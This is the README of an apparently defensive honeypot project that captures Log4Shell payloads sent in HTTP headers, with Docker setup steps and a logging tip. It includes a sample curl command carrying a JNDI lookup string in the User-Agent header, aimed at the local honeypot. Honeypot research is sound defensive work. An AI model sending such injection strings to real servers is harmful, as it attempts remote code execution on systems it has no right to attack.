# log4shell-honeypot
Catch and download `log4shell` payloads sent within HTTP headers. Modified version of [Adikso's minecraft honeypot]( ,[sysgoblin's log4shell-honeypot]( and [LoginRadius](

## Setup
1. `git clone $repo`
2. `docker-compose up`
3. Send payloads within a http header to `$dockerip:$port`

To add additional honeypots on different ports, copy and paste an existing service within `docker-compose.yml`, changing the service name, and alter the ports within `ports` and `command`.
curl --user-agent '${jndi:ldap://}' http://localhost:80

Payloads are saved within `payloads/`

Logs are printed to the screen by default, but can be retreived with `docker inspect`. e.g: 
docker inspect --format='{{.LogPath}}' log4shell-honeypot_http_1 | xargs cat
## ToDo
1. Fix display of static files (probably a proxy issue).
2. Log format needs to be modified to ISO8601 and to match the format used in T-Pot (preferably JSON).
3. At the time of writing, the HoneyPot logs the requests sent, it would be nice if the username/password form could also log the sent payloads.
4. Make the front-end look a bit nicer.
5. Better testing environment. Maybe with a self hosted LDAP server to validate all functions.